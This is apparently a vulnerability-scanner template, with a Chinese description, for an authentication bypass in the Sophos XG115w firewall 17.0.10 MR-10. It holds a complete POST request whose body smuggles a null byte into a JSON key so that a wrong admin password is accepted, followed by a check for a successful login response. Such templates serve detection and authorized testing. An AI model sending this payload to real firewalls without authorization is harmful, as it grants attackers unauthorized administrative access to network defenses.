漏洞描述
此漏洞允许攻击者通过绕过身份验证获得对防火墙管理空间的未经授权的访问。
id: sophos-xg115w-firewall-mr-10-authentication
info:
name: Sophos XG115w Firewall 17.0.10 MR-10 - Authentication Bypass
author: Aryan Chehreghani
severity: high
verified: true
description: 此漏洞允许攻击者通过绕过身份验证获得对防火墙管理空间的未经授权的访问。
reference:
- https://www.exploit-db.com/exploits/51006
set:
hosturl: request.url
rules:
r0:
request:
method: POST
path: /webconsole/Controller
headers:
Cookie: JSESSIONID=c893loesu9tnlvkq53hy1jiq103
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: "{{hosturl}}"
Referer: "{{hosturl}}/webconsole/webpages/login.jsp"
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
body: |
mode=151&json={"username"%3a"admin","password"%3a"somethingnotpassword","languageid"%3a"1","browser"%3a"Chrome_101","accessaction"%3a1,+"mode\u0000ef"%3a716}&__RequestType=ajax&t=1653896534066
expression: response.status == 200 && response.body.bcontains(b'{"redirectionURL":') && response.body.bcontains(b'"/webpages/index.jsp"') && response.body.bcontains(b'"status":')
expression: r0()